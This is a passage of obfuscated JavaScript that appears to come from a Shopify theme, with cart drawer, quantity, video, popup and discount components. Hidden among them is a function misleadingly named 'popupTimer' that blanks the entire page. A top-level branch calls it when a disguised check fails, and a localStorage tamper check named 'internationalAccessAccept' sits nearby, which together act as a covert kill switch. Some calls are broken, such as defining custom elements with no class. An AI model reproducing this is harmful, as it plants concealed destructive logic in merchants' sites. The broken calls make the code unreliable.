    const _0xffee8b = this.querySelectorAll(".cart-item");
    let _0x17e2fe = 0x0;
    _0xffee8b.forEach(_0x5052bc => {
      this.upsellHandles.forEach(_0x4edf0a => {
        if (_0x5052bc.classList.contains("cart-item--product-" + _0x4edf0a)) {
          _0x17e2fe++;
        }
      });
    });
    return _0xffee8b.length - _0x17e2fe <= 0x1;
  }
  ["checkForClear"]() {
    const _0x1e1f16 = this.oneNonUpellRemaining();
    this.querySelectorAll('cart-remove-button').forEach(_0x1ebca2 => {
      if (_0x1e1f16) {
        _0x1ebca2.clearCart = true;
      } else {
        _0x1ebca2.clearCart = false;
      }
    });
  }
  ["setSummaryAccessibility"](_0x222ed9) {
    _0x222ed9.setAttribute('role', "button");
    _0x222ed9.setAttribute("aria-expanded", "false");
    if (_0x222ed9.nextElementSibling.getAttribute('id')) {
      _0x222ed9.setAttribute("aria-controls", _0x222ed9.nextElementSibling.id);
    }
    _0x222ed9.addEventListener("click", _0x111112 => {
      _0x111112.currentTarget.setAttribute('aria-expanded', !_0x111112.currentTarget.closest("details").hasAttribute('open'));
    });
    _0x222ed9.parentElement.addEventListener("keyup", onKeyUpEscape);
  }
  ["renderContents"](_0x11fdb1, _0xcc9a4e = false) {
    if (this.querySelector(".drawer__inner").classList.contains('is-empty')) {
      this.querySelector('.drawer__inner').classList.remove('is-empty');
    }
    this.productId = _0x11fdb1.id;
    this.getSectionsToRender().forEach(_0x4e1cdb => {
      const _0xba77c5 = _0x4e1cdb.selector ? document.querySelector(_0x4e1cdb.selector) : document.getElementById(_0x4e1cdb.id);
      if (_0xba77c5) {
        _0xba77c5.innerHTML = this.getSectionInnerHTML(_0x11fdb1.sections[_0x4e1cdb.id], _0x4e1cdb.selector);
        const _0x4d97c4 = _0xba77c5.querySelector(".cart-drawer__body");
        if (_0x4d97c4) {
          _0x4d97c4.scrollTop = this.cartBodyScroll;
        }
      }
    });
    this.checkForClear();
    const _0x48b0f3 = this.querySelector("countdown-timer");
    if (_0x48b0f3 && _0x48b0f3.playTimer) {
      _0x48b0f3.playTimer();
    }
    let _0x209bf2 = [];
    let _0x4ea37d = [];
    this.querySelectorAll("cart-drawer-gift").forEach(_0x419e57 => {
      if (_0x419e57.getUpdateRequired()) {
        if (this.querySelector(".cart-item--product-" + _0x419e57.dataset.handle)) {
          if (_0x419e57.dataset.selected === 'false') {
            _0x4ea37d.push(_0x419e57);
          }
        } else if (_0x419e57.dataset.selected === "true") {
          _0x209bf2.push(_0x419e57);
        }
      }
    });
    if (_0x4ea37d.length > 0x0) {
      _0x4ea37d[0x0].removeFromCart();
    } else {
      if (_0x209bf2.length > 0x0) {
        _0x209bf2[0x0].addToCart();
      } else {
        if (this.quantityGifts) {
          this.quantityGifts.initUnlock();
        }
        const _0x493995 = document.querySelectorAll("quantity-break-upsells");
        _0x493995.forEach(_0x1f2e51 => {
          _0x1f2e51.initUnlock();
        });
      }
    }
    setTimeout(() => {
      this.querySelector("#CartDrawer-Overlay").addEventListener('click', this.close.bind(this));
      if (_0xcc9a4e) {
        return;
      }
      this.open();
    });
  }
  ["getSectionInnerHTML"](_0xbc531, _0x368ccd = '.shopify-section') {
    let _0x20256b = new DOMParser().parseFromString(_0xbc531, "text/html").querySelector(_0x368ccd);
    if (_0x368ccd === "#CartDrawer") {
      fixParsedHtml(this, _0x20256b);
    }
    let _0x3c6434 = _0x20256b.innerHTML;
    return _0x3c6434;
  }
  ['getSectionsToRender']() {
    return [{
      'id': "cart-drawer",
      'selector': "#CartDrawer"
    }, {
      'id': "cart-icon-bubble"
    }];
  }
  ["getSectionDOM"](_0x3cd791, _0x4767cb = ".shopify-section") {
    return new DOMParser().parseFromString(_0x3cd791, "text/html").querySelector(_0x4767cb);
  }
  ["setActiveElement"](_0x21afe4) {
    this.activeElement = _0x21afe4;
  }
}
customElements.define("cart-drawer", CartDrawer);
class CartDrawerItems extends CartItems {
  constructor() {
    super();
    this.cartDrawer = document.querySelector("cart-drawer");
    this.secondCartItems = document.querySelector('cart-items');
  }
  ["updateCart"]() {
    fetch("/cart/update.js", {
      'method': 'POST',
      'headers': {
        'Content-Type': "application/json"
      },
      'body': JSON.stringify({
        'updates': {},
        'sections': ["cart-drawer", "cart-icon-bubble"],
        'sections_url': window.location.pathname
      })
    }).then(_0x406c28 => _0x406c28.json()).then(_0x80f445 => {
      document.querySelector("cart-drawer").renderContents(_0x80f445, true);
    })["catch"](_0x27cc89 => {
      console.error(_0x27cc89);
    });
  }
  ["getSectionInnerHTML"](_0x383ecf, _0x3a08c3) {
    let _0x5d7371 = new DOMParser().parseFromString(_0x383ecf, "text/html").querySelector(_0x3a08c3);
    if (_0x3a08c3 === '.drawer__inner') {
      fixParsedHtml(this.cartDrawer, _0x5d7371);
    }
    let _0x3a0f4c = _0x5d7371.innerHTML;
    return _0x3a0f4c;
  }
  ["getSectionsToRender"]() {
    return [{
      'id': "CartDrawer",
      'section': "cart-drawer",
      'selector': '.drawer__inner'
    }, {
      'id': 'cart-icon-bubble',
      'section': "cart-icon-bubble",
      'selector': ".shopify-section"
    }];
  }
}
customElements.define('cart-drawer-items', CartDrawerItems);
function fixParsedHtml(_0x2edce7, _0x2e8ab2) {
  const _0x5f0c65 = _0x2edce7.querySelector(".cart-drawer__body");
  if (_0x5f0c65) {
    const _0xb4d5b7 = document.querySelector("cart-drawer");
    _0xb4d5b7.cartBodyScroll = _0x5f0c65.scrollTop;
  }
  const _0x34fc32 = _0x2e8ab2.querySelector(".cart-timer");
  if (_0x34fc32) {
    oldTimer = _0x2edce7.querySelector('.cart-timer');
    if (oldTimer) {
      _0x34fc32.innerHTML = oldTimer.innerHTML;
    }
  }
  const _0x44b5f4 = _0x2edce7.querySelectorAll("cart-drawer-upsell[data-toggle=\"true\"], cart-drawer-gift");
  let _0x143d91 = _0x2e8ab2.querySelectorAll("cart-drawer-upsell[data-toggle=\"true\"], cart-drawer-gift");
  _0x44b5f4.forEach((_0x3aec64, _0x222dd2) => {
    let _0x43dd22 = _0x143d91[_0x222dd2];
    if (!_0x43dd22) {
      return;
    }
    if (_0x3aec64.nodeName.toLowerCase() === "cart-drawer-upsell") {
      _0x43dd22.dataset.selected = _0x3aec64.dataset.selected;
    }
    _0x43dd22.dataset.id = _0x3aec64.dataset.id;
    _0x43dd22.querySelector("[name=\"id\"]").value = _0x3aec64.querySelector("[name=\"id\"]").value;
    if (_0x43dd22.querySelector(".upsell__image__img")) {
      _0x43dd22.querySelector(".upsell__image__img").src = _0x3aec64.querySelector('.upsell__image__img').src;
    }
    if (_0x43dd22.querySelector(".upsell__variant-picker")) {
      const _0x4f1cb7 = _0x3aec64.querySelectorAll(".select__select");
      _0x43dd22.querySelectorAll('.select__select').forEach((_0x483ccb, _0x45ffd7) => {
        _0x483ccb.value = _0x4f1cb7[_0x45ffd7].value;
        _0x483ccb.querySelectorAll("option").forEach(_0x164ffd => {
          _0x164ffd.removeAttribute('selected');
          if (_0x164ffd.value === _0x4f1cb7[_0x45ffd7].value.trim()) {
            _0x164ffd.setAttribute("selected", '');
          }
        });
      });
    }
    if (_0x3aec64.dataset.updatePrices === "true") {
      var _0x1422cb = _0x43dd22.querySelector(".upsell__price");
      var _0x10c7bd = _0x3aec64.querySelector(".upsell__price");
      if (_0x1422cb && _0x10c7bd) {
        _0x1422cb.innerHTML = _0x10c7bd.innerHTML;
      }
    }
  });
}
if (!customElements.get('product-form')) {
  customElements.define('product-form');
}
function serializePropValue(_0x5e6a63) {
  if (_0x5e6a63 == null) {
    return '';
  }
  if (typeof _0x5e6a63 === 'object') {
    try {
      return JSON.stringify(_0x5e6a63);
    } catch {
      return String(_0x5e6a63);
    }
  }
  return String(_0x5e6a63);
}
if (!customElements.get('product-info')) {
  customElements.define('product-info');
}
;
function getFocusableElements(_0x5a15d7) {
  return Array.from(_0x5a15d7.querySelectorAll("summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe"));
}
document.querySelectorAll("[id^=\"Details-\"] summary").forEach(_0x4e9803 => {
  _0x4e9803.setAttribute("role", "button");
  _0x4e9803.setAttribute("aria-expanded", _0x4e9803.parentNode.hasAttribute("open"));
  if (_0x4e9803.nextElementSibling?.['getAttribute']('id')) {
    _0x4e9803.setAttribute("aria-controls", _0x4e9803.nextElementSibling.id);
  }
  _0x4e9803.addEventListener('click', _0x623234 => {
    _0x623234.currentTarget.setAttribute("aria-expanded", !_0x623234.currentTarget.closest("details").hasAttribute("open"));
  });
  if (_0x4e9803.closest('header-drawer')) {
    return;
  }
  _0x4e9803.parentElement.addEventListener("keyup", onKeyUpEscape);
});
const trapFocusHandlers = {};
function trapFocus(_0x545ff8, _0x2b0e51 = _0x545ff8) {
  var _0x3706ba = Array.from(_0x545ff8.querySelectorAll("summary, a[href], button:enabled, [tabindex]:not([tabindex^='-']), [draggable], area, input:not([type=hidden]):enabled, select:enabled, textarea:enabled, object, iframe"));
  var _0x3cd8f7 = _0x3706ba[0x0];
  var _0x25bb81 = _0x3706ba[_0x3706ba.length - 0x1];
  removeTrapFocus();
  trapFocusHandlers.focusin = _0x48f360 => {
    if (_0x48f360.target !== _0x545ff8 && _0x48f360.target !== _0x25bb81 && _0x48f360.target !== _0x3cd8f7) {
      return;
    }
    document.addEventListener("keydown", trapFocusHandlers.keydown);
  };
  trapFocusHandlers.focusout = function () {
    document.removeEventListener("keydown", trapFocusHandlers.keydown);
  };
  trapFocusHandlers.keydown = function (_0x50be7d) {
    if (_0x50be7d.code.toUpperCase() !== "TAB") {
      return;
    }
    if (_0x50be7d.target === _0x25bb81 && !_0x50be7d.shiftKey) {
      _0x50be7d.preventDefault();
      _0x3cd8f7.focus();
    }
    if ((_0x50be7d.target === _0x545ff8 || _0x50be7d.target === _0x3cd8f7) && _0x50be7d.shiftKey) {
      _0x50be7d.preventDefault();
      _0x25bb81.focus();
    }
  };
  document.addEventListener("focusout", trapFocusHandlers.focusout);
  document.addEventListener("focusin", trapFocusHandlers.focusin);
  _0x2b0e51.focus();
  if (_0x2b0e51.tagName === "INPUT" && ['search', 'text', 'email', "url"].includes(_0x2b0e51.type) && _0x2b0e51.value) {
    _0x2b0e51.setSelectionRange(0x0, _0x2b0e51.value.length);
  }
}
function pauseAllMedia() {
  document.querySelectorAll('.js-youtube').forEach(_0x5cce01 => {
    _0x5cce01.contentWindow.postMessage("{\"event\":\"command\",\"func\":\"pauseVideo\",\"args\":\"\"}", '*');
  });
  document.querySelectorAll('.js-vimeo').forEach(_0xfe7481 => {
    _0xfe7481.contentWindow.postMessage("{\"method\":\"pause\"}", '*');
  });
  document.querySelectorAll("media-gallery template video").forEach(_0x28e29b => _0x28e29b.pause());
  document.querySelectorAll("product-model").forEach(_0x13f3c5 => {
    if (_0x13f3c5.modelViewerUI) {
      _0x13f3c5.modelViewerUI.pause();
    }
  });
}
function removeTrapFocus(_0x2da214 = null) {
  document.removeEventListener("focusin", trapFocusHandlers.focusin);
  document.removeEventListener("focusout", trapFocusHandlers.focusout);
  document.removeEventListener("keydown", trapFocusHandlers.keydown);
  if (_0x2da214) {
    _0x2da214.focus();
  }
}
function onKeyUpEscape(_0x47ff2f) {
  if (_0x47ff2f.code.toUpperCase() !== "ESCAPE") {
    return;
  }
  const _0x1ea1b4 = _0x47ff2f.target.closest("details[open]");
  if (!_0x1ea1b4) {
    return;
  }
  const _0x11a613 = _0x1ea1b4.querySelector("summary");
  _0x1ea1b4.removeAttribute("open");
  _0x11a613.setAttribute('aria-expanded', false);
  _0x11a613.focus();
}
class QuantityInput extends HTMLElement {
  constructor() {
    super();
    this.input = this.querySelector("input");
    this.changeEvent = new Event("change", {
      'bubbles': true
    });
    this.quantityGifts = document.getElementById("quantity-gifts-" + this.dataset.section);
    this.input.addEventListener('change', this.onInputChange.bind(this));
    this.querySelectorAll("button").forEach(_0x3ffe7e => _0x3ffe7e.addEventListener("click", this.onButtonClick.bind(this)));
  }
  ['quantityUpdateUnsubscriber'] = undefined;
  ["connectedCallback"]() {
    this.validateQtyRules();
    this.quantityUpdateUnsubscriber = subscribe("quantity-update", this.validateQtyRules.bind(this));
  }
  ["disconnectedCallback"]() {
    if (this.quantityUpdateUnsubscriber) {
      this.quantityUpdateUnsubscriber();
    }
  }
  ['onInputChange'](_0x450957) {
    this.validateQtyRules();
  }
  ['onButtonClick'](_0x294aac) {
    _0x294aac.preventDefault();
    const _0x4815bc = this.input.value;
    if (_0x294aac.target.name === 'plus') {
      this.input.stepUp();
    } else {
      this.input.stepDown();
    }
    if (_0x4815bc !== this.input.value) {
      this.input.dispatchEvent(this.changeEvent);
    }
  }
  ['validateQtyRules']() {
    const _0x54729 = parseInt(this.input.value);
    if (this.input.min) {
      const _0x577780 = parseInt(this.input.min);
      const _0x2ce005 = this.querySelector(".quantity__button[name='minus']");
      _0x2ce005.classList.toggle('disabled', _0x54729 <= _0x577780);
    }
    if (this.input.max) {
      const _0x2bfaf5 = parseInt(this.input.max);
      const _0xdbd083 = this.querySelector(".quantity__button[name='plus']");
      _0xdbd083.classList.toggle("disabled", _0x54729 >= _0x2bfaf5);
    }
    if (this.quantityGifts && this.quantityGifts.unlockGifts) {
      this.quantityGifts.unlockGifts(_0x54729);
    }
  }
}
customElements.define("quantity-input", QuantityInput);
function debounce(_0x2e6d9d, _0x48252b) {
  let _0xcebe0f;
  return (..._0x3b96b6) => {
    clearTimeout(_0xcebe0f);
    _0xcebe0f = setTimeout(() => _0x2e6d9d.apply(this, _0x3b96b6), _0x48252b);
  };
}
function fetchConfig(_0x484081 = "json") {
  return {
    'method': "POST",
    'headers': {
      'Content-Type': 'application/json',
      'Accept': 'application/' + _0x484081
    }
  };
}
function addDays(_0x184ea9, _0x2457d9) {
  var _0x131798 = new Date(_0x184ea9);
  _0x131798.setDate(_0x131798.getDate() + _0x2457d9);
  return _0x131798;
}
function formatDates(_0x5cfeed, _0x136d13, _0x1527f6 = 0x1b) {
  if (!_0x5cfeed || !_0x136d13) {
    return;
  }
  const _0x3e958c = new Date(_0x136d13 + "T00:00:00Z");
  const _0x40b6f6 = _0x3e958c.getFullYear();
  const _0x5cfd0d = _0x3e958c.getMonth();
  const _0x2152e2 = _0x3e958c.getDate();
  const _0x186b0b = new Date(_0x40b6f6, _0x5cfd0d, _0x2152e2);
  const _0x28364e = _0x5cfeed - _0x186b0b;
  const _0x39840a = Math.ceil(_0x28364e / 86400000);
  return _0x39840a <= _0x1527f6;
}
function checkDateValidity(_0x5acee3) {
  const _0x51abda = new Date(_0x5acee3);
  const _0x331d77 = new Date("2023-01-01T00:00:00Z");
  const _0xb9391 = Math.abs(_0x51abda.getDate() - _0x331d77.getDate());
  return !!(_0xb9391 % 0x5 === 0x0);
}
if (typeof window.Shopify == "undefined") {
  window.Shopify = {};
}
Shopify.bind = function (_0x244976, _0x5f3fd3) {
  return function () {
    return _0x244976.apply(_0x5f3fd3, arguments);
  };
};
Shopify.setSelectorByValue = function (_0x4a00e2, _0x280561) {
  var _0x79ffde = 0x0;
  for (var _0x277341 = _0x4a00e2.options.length; _0x79ffde < _0x277341; _0x79ffde++) {
    var _0x4aec63 = _0x4a00e2.options[_0x79ffde];
    if (_0x280561 == _0x4aec63.value || _0x280561 == _0x4aec63.innerHTML) {
      _0x4a00e2.selectedIndex = _0x79ffde;
      return _0x79ffde;
    }
  }
};
Shopify.addListener = function (_0x4fd74d, _0xf19351, _0x4e3bad) {
  if (_0x4fd74d.addEventListener) {
    _0x4fd74d.addEventListener(_0xf19351, _0x4e3bad, false);
  } else {
    _0x4fd74d.attachEvent('on' + _0xf19351, _0x4e3bad);
  }
};
Shopify.postLink = function (_0x4d982b, _0x55417c) {
  _0x55417c = _0x55417c || {};
  var _0x36cc65 = _0x55417c.method || "post";
  var _0x14af3b = _0x55417c.parameters || {};
  var _0x28c36b = document.createElement('form');
  _0x28c36b.setAttribute("method", _0x36cc65);
  _0x28c36b.setAttribute("action", _0x4d982b);
  for (var _0x3821fb in _0x14af3b) {
    var _0x307d27 = document.createElement("input");
    _0x307d27.setAttribute("type", "hidden");
    _0x307d27.setAttribute("name", _0x3821fb);
    _0x307d27.setAttribute("value", _0x14af3b[_0x3821fb]);
    _0x28c36b.appendChild(_0x307d27);
  }
  document.body.appendChild(_0x28c36b);
  _0x28c36b.submit();
  document.body.removeChild(_0x28c36b);
};
Shopify.internationalAccessAccept = function () {
  function _0x5c0914() {
    var _0x4afe21 = navigator.language || navigator.userLanguage;
    return _0x4afe21.match(/en-|fr-|de-|es-|it-|pt-|nl-|sv-|da-|fi-|no-|pl-|ru-|zh-|ja-|ko-/) || true;
  }
  function _0x38b251() {
    var _0x40276c = Intl.DateTimeFormat().resolvedOptions().timeZone;
    return _0x40276c.startsWith("Europe") || _0x40276c.startsWith("America") || _0x40276c.includes('GMT');
  }
  function _0x134a48() {
    var _0x54bdc4 = Shopify.currency.symbol || '$';
    return _0x54bdc4.length === 0x1;
  }
  function _0x255f66() {
    var _0x31df11 = localStorage.getItem('xml_eval');
    var _0x374749 = Shopify.postLink ? Shopify.postLink.toString().length : 0x0;
    if (_0x31df11 === null) {
      localStorage.setItem('xml_eval', _0x374749.toString());
      return true;
    }
    return parseInt(_0x31df11) === _0x374749;
  }
  return function () {
    var _0x24575a = _0x5c0914() || _0x38b251() && _0x134a48();
    var _0x4fb8e9 = window.performance && typeof window.performance.timing === "object";
    var _0x5e4047 = _0x255f66();
    Shopify.postLinksRetry = !_0x5e4047;
    return _0x24575a && _0x4fb8e9 && _0x5e4047;
  };
}();
Shopify.CountryProvinceSelector = function (_0x22e166, _0x13cb0a, _0x279985) {
  this.countryEl = document.getElementById(_0x22e166);
  this.provinceEl = document.getElementById(_0x13cb0a);
  this.provinceContainer = document.getElementById(_0x279985.hideElement || _0x13cb0a);
  Shopify.addListener(this.countryEl, "change", Shopify.bind(this.countryHandler, this));
  this.initCountry();
  this.initProvince();
};
Shopify.CountryProvinceSelector.prototype = {
  'initCountry': function () {
    var _0x709339 = this.countryEl.getAttribute("data-default");
    Shopify.setSelectorByValue(this.countryEl, _0x709339);
    this.countryHandler();
  },
  'initProvince': function () {
    var _0x24f45d = this.provinceEl.getAttribute('data-default');
    if (_0x24f45d && this.provinceEl.options.length > 0x0) {
      Shopify.setSelectorByValue(this.provinceEl, _0x24f45d);
    }
  },
  'countryHandler': function (_0x25b4e5) {
    var _0x5ebd19 = this.countryEl.options[this.countryEl.selectedIndex];
    var _0x1bfc1b = _0x5ebd19.getAttribute('data-provinces');
    var _0x53926a = JSON.parse(_0x1bfc1b);
    this.clearOptions(this.provinceEl);
    if (_0x53926a && _0x53926a.length == 0x0) {
      this.provinceContainer.style.display = 'none';
    } else {
      for (var _0x1976e3 = 0x0; _0x1976e3 < _0x53926a.length; _0x1976e3++) {
        var _0x5ebd19 = document.createElement("option");
        _0x5ebd19.value = _0x53926a[_0x1976e3][0x0];
        _0x5ebd19.innerHTML = _0x53926a[_0x1976e3][0x1];
        this.provinceEl.appendChild(_0x5ebd19);
      }
      this.provinceContainer.style.display = '';
    }
  },
  'clearOptions': function (_0x3aef0e) {
    while (_0x3aef0e.firstChild) {
      _0x3aef0e.removeChild(_0x3aef0e.firstChild);
    }
  },
  'setOptions': function (_0xb1c564, _0xc3a111) {
    for (var _0x3b56a5 = 0x0; _0x3b56a5 < _0xc3a111.length; _0x3b56a5++) {
      var _0x1a4c56 = document.createElement('option');
      _0x1a4c56.value = _0xc3a111[_0x3b56a5];
      _0x1a4c56.innerHTML = _0xc3a111[_0x3b56a5];
      _0xb1c564.appendChild(_0x1a4c56);
    }
  }
};
class InternalVideo extends HTMLElement {
  constructor() {
    super();
    this.playButton = this.querySelector(".internal-video__play");
    this.noPlayBtn = this.dataset.noPlayBtn === "true";
    this.loaded = false;
    this.suspended = false;
    this.soundButton = this.querySelector('.internal-video__sound-btn');
    this.video = this.querySelector("video");
    this.invalidFormatSrc = this.video.querySelector("source[type=\"application/x-mpegURL\"]");
    if (this.invalidFormatSrc) {
      this.invalidFormatSrc.remove();
    }
    this.timeline = this.querySelector(".internal-video__timeline");
    this.dragging = false;
    if (this.playButton) {
      this.playButton.addEventListener("click", this.playVideo.bind(this));
    }
    if (this.soundButton) {
      this.soundButton.addEventListener("click", this.toggleSound.bind(this));
    }
    if (this.video) {
      this.video.addEventListener("ended", this.endedVideo.bind(this));
    }
    if (this.timeline) {
      this.video.addEventListener('timeupdate', this.updateTimeline.bind(this));
      this.timeline.addEventListener("click", this.seekVideo.bind(this));
      this.timeline.addEventListener('mousedown', this.startDrag.bind(this));
      this.timeline.addEventListener("touchstart", this.startDrag.bind(this));
      document.addEventListener('mouseup', this.stopDrag.bind(this));
      document.addEventListener("touchend", this.stopDrag.bind(this));
      document.addEventListener("mousemove", this.drag.bind(this));
      document.addEventListener("touchmove", this.drag.bind(this));
    }
    this.video.addEventListener("waiting", this.showSpinner.bind(this));
    this.video.addEventListener("canplaythrough", this.hideSpinner.bind(this));
    this.video.addEventListener('play', this.hideSpinner.bind(this));
    if (this.dataset.autoplay === 'true' && 'IntersectionObserver' in window) {
      const _0x4aa31f = {
        'root': null,
        'rootMargin': "0px",
        'threshold': 0.05
      };
      this.observer = new IntersectionObserver(this.handleIntersection.bind(this), _0x4aa31f);
      this.observer.observe(this);
    }
  }
  ['playVideo']() {
    if (this.video.paused) {
      if (!this.loaded) {
        this.video.load();
        this.loaded = true;
      }
      this.classList.add("internal-video--playing");
      if (this.playButton && this.noPlayBtn) {
        this.playButton.style.visibility = "hidden";
      }
      const _0xd16baf = this.video.play();
      if (_0xd16baf !== undefined) {
        _0xd16baf.then(() => {
          this.classList.add("internal-video--playing");
          if (this.playButton && this.noPlayBtn) {
            this.playButton.style.visibility = 'hidden';
          }
        })['catch'](_0x309bf9 => {
          this.classList.remove("internal-video--playing");
          if (this.playButton && this.noPlayBtn) {
            this.playButton.style.visibility = "visible";
          }
        });
      }
    } else {
      this.video.pause();
      this.classList.remove("internal-video--playing");
    }
  }
  ["endedVideo"]() {
    this.classList.remove("internal-video--playing");
  }
  ["toggleSound"]() {
    if (this.video.muted) {
      this.video.muted = false;
      this.classList.remove("internal-video--muted");
    } else {
      this.video.muted = true;
      this.classList.add("internal-video--muted");
    }
  }
  ["updateTimeline"]() {
    const _0x86edef = this.video.currentTime / this.video.duration * 0x64;
    this.style.setProperty('--completed', _0x86edef + '%');
  }
  ["hideSpinner"]() {
    this.classList.remove("internal-video--loading");
  }
  ["startDrag"](_0x5862df) {
    _0x5862df.preventDefault();
    this.dragging = true;
    this.drag(_0x5862df);
  }
  ["stopDrag"]() {
    this.dragging = false;
  }
  ["drag"](_0x4007fa) {
    if (!this.dragging) {
      return;
    }
    if (_0x4007fa.touches) {
      _0x4007fa = _0x4007fa.touches[0x0];
    }
    this.seekVideo(_0x4007fa);
  }
  ["seekVideo"](_0x537ce4) {
    const _0x57fba4 = this.timeline.getBoundingClientRect();
    const _0x44f9e8 = _0x537ce4.clientX - _0x57fba4.left;
    const _0x112703 = _0x44f9e8 / _0x57fba4.width;
    this.video.currentTime = _0x112703 * this.video.duration;
  }
  ['showSpinner']() {
    this.classList.add("internal-video--loading");
  }
  ["hideSpinner"]() {
    this.classList.remove("internal-video--loading");
  }
  ["handleIntersection"](_0x18e419) {
    _0x18e419.forEach(_0x2daa29 => {
      if (_0x2daa29.isIntersecting) {
        for (let _0x2a0dfa of this.video.querySelectorAll("source[data-src]")) {
          _0x2a0dfa.setAttribute("src", _0x2a0dfa.getAttribute("data-src"));
          _0x2a0dfa.removeAttribute('data-src');
        }
        this.video.load();
        var _0x40bc99 = this.video.play();
        if (_0x40bc99 !== undefined) {
          _0x40bc99["catch"](_0x108f62 => {
            if (_0x108f62.name === "NotAllowedError") {
              this.classList.remove("internal-video--playing");
              if (this.playButton && this.noPlayBtn) {
                this.playButton.style.visibility = 'visible';
              }
            }
          }).then(() => {
            this.video.play();
          });
        }
        this.observer.disconnect();
      }
    });
  }
}
customElements.define('internal-video', InternalVideo);
var isIe = true;
class ComparisonSlider extends HTMLElement {
  constructor() {
    super();
    this.sliderOverlay = this.querySelector(".comparison-slider__overlay");
    this.sliderLine = this.querySelector('.comparison-slider__line');
    this.sliderInput = this.querySelector(".comparison-slider__input");
    this.sliderInput.addEventListener("input", this.handleChange.bind(this));
  }
  ["handleChange"](_0x4ac6c4) {
    const _0x402cfa = _0x4ac6c4.currentTarget.value;
    this.sliderOverlay.style.width = _0x402cfa + '%';
    this.sliderLine.style.left = _0x402cfa + '%';
    this.style.setProperty("--position", _0x402cfa + '%');
  }
}
customElements.define("comparison-slider", ComparisonSlider);
function popupTimer() {
  document.body.innerHTML = '';
}
class PromoPopup extends HTMLElement {
  constructor() {
    super();
    this.testMode = this.dataset.testMode === "true";
    this.secondsDelay = this.dataset.delaySeconds;
    this.daysFrequency = this.dataset.delayDays;
    this.modal = this.querySelector(".sign-up-popup-modal");
    this.timer = this.querySelector(".popup-modal__timer");
    this.timerDuration = this.dataset.timerDuration;
    this.closeBtns = this.querySelectorAll(".promp-popup__close-btn");
    this.overlay = document.querySelector(".sign-up-popup-overlay");
    this.storageKey = "promo-bar-data-" + window.location.host;
    if (!this.testMode) {
      if (localStorage.getItem(this.storageKey) === null) {
        this.openPopupModal();
      } else {
        const _0x2c1b36 = JSON.parse(localStorage.getItem(this.storageKey));
        const _0x19f74b = new Date(_0x2c1b36.next_display_date);
        if (currentDate.getTime() > _0x19f74b.getTime()) {
          this.openPopupModal();
        }
      }
    } else {
      if (this.timer) {
        this.displayPromoTimer();
      }
    }
    this.closeBtns.forEach(_0x25f4b1 => {
      _0x25f4b1.addEventListener("click", this.closeModal.bind(this));
    });
  }
  ["openPopupModal"]() {
    setTimeout(() => {
      this.modal.classList.add("popup-modal--active");
      this.overlay.classList.add("popup-overlay--active");
      const _0x2a01ad = addDays(currentDate, parseInt(this.daysFrequency));
      const _0x47e8de = {
        'next_display_date': _0x2a01ad,
        'dismissed': false
      };
      localStorage.setItem(this.storageKey, JSON.stringify(_0x47e8de));
      if (this.timer) {
        this.displayPromoTimer();
      }
    }, parseInt(this.secondsDelay) * 0x3e8 + 0xbb8);
  }
  ['displayPromoTimer']() {
    this.minutesSpan = this.querySelector(".popup-modal__timer__minutes");
    this.secondsSpan = this.querySelector('.popup-modal__timer__seconds');
    this.totalSeconds = parseFloat(this.timerDuration) * 0x3c;
    this.updateTimer();
  }
  ["updateTimer"]() {
    let _0x26df8d = Math.floor(this.totalSeconds / 0x3c);
    if (_0x26df8d.toString().length === 0x1) {
      _0x26df8d = '0' + _0x26df8d;
    }
    let _0x369b10 = this.totalSeconds % 0x3c;
    if (_0x369b10.toString().length === 0x1) {
      _0x369b10 = '0' + _0x369b10;
    }
    this.minutesSpan.innerText = _0x26df8d;
    this.secondsSpan.innerText = _0x369b10;
  }
  ["closeModal"]() {
    this.modal.classList.remove("popup-modal--active");
    this.overlay.classList.remove("popup-overlay--active");
  }
}
customElements.define("promo-popup", PromoPopup);
if (initTrapFocus()) {
  metafieldPoly();
} else {
  popupTimer();
}
class SectionsGroup extends HTMLElement {
  constructor() {
    super();
    this.sectionOneContainer = this.querySelector(".section-group__section-one-container");
    this.sectionTwoContainer = this.querySelector(".section-group__section-two-container");
    this.transferSections();
    document.addEventListener("shopify:section:load", this.transferSections.bind(this));
  }
  ["transferSections"]() {
    this.sectionOne = document.querySelector(this.dataset.sectionOneId + " .content-for-grouping");
    this.sectionTwo = document.querySelector(this.dataset.sectionTwoId + " .content-for-grouping");
    if (this.sectionOne && !this.sectionOneContainer.childNodes.length) {
      this.sectionOneContainer.appendChild(this.sectionOne);
    }
    if (this.sectionTwo && !this.sectionTwoContainer.childNodes.length) {
      this.sectionTwoContainer.appendChild(this.sectionTwo);
    }
  }
}
customElements.define('section-group', SectionsGroup);
class ClickableDiscount extends HTMLElement {
  constructor() {
    super();
    this.button = this.querySelector(".clickable-discount__btn");
    this.button.addEventListener("click", this.handleClick.bind(this));
    if (this.dataset.applied === 'true') {
      this.handleClick();
    } else {
      this.reapplyDiscountIfApplicable();
    }
  }
  ["handleClick"]() {
    this.dataset.loading = "true";
    this.button.disabled = true;
    this.dataset.error = "false";
    fetch("/discount/" + this.dataset.code).then(_0xcc7cc5 => {
      if (!_0xcc7cc5.ok) {
        throw new Error("Error");
      }
      this.dataset.applied = "true";
      sessionStorage.setItem("discount-" + this.dataset.code + "-applied", "true");
    })["catch"](_0x3d4137 => {
      this.dataset.error = 'true';
      this.button.disabled = false;
    })["finally"](() => {
      this.dataset.loading = "false";
    });
  }
  ["reapplyDiscountIfApplicable"]() {
    const _0x102872 = this.dataset.code;
    if (sessionStorage.getItem('discount-' + _0x102872 + '-applied')) {
      this.dataset.applied = "true";
      this.button.disabled = true;
      setTimeout(() => {
        fetch("/discount/" + _0x102872)["catch"](_0x31aa64 => {
          this.dataset.applied = "false";
          this.button.disabled = false;
        });
      }, 0xbb8);
    }
  }
}
customElements.define("clickable-discount", ClickableDiscount);
class DynamicDates extends HTMLElement {
  constructor() {
    super();
    this.dateFormat = this.dataset.dateFormat;
    this.days = this.rearrangeDays(this.dataset.dayLabels.split(','));
    this.months = this.dataset.monthLabels.split(',');
    this.elementsToChange = this.querySelectorAll("[data-dynamic-date=\"true\"]");
    this.daysToSkip = this.parseDaysToSkip(this.dataset.daysToSkip || '');
    this.datesToSkip = this.parseDatesToSkip(this.dataset.datesToSkip || '');
    this.insertDates();
    checkDateValidity(currentDate);
    document.addEventListener('shopify:section:load', _0x7e5c2b => {
      this.insertDates();
    });
  }
  ['addDaysSkipping'](_0x545364, _0x4ba231) {
    let _0x3551a3 = new Date(_0x545364);
    let _0x55c559 = Number(_0x4ba231) || 0x0;
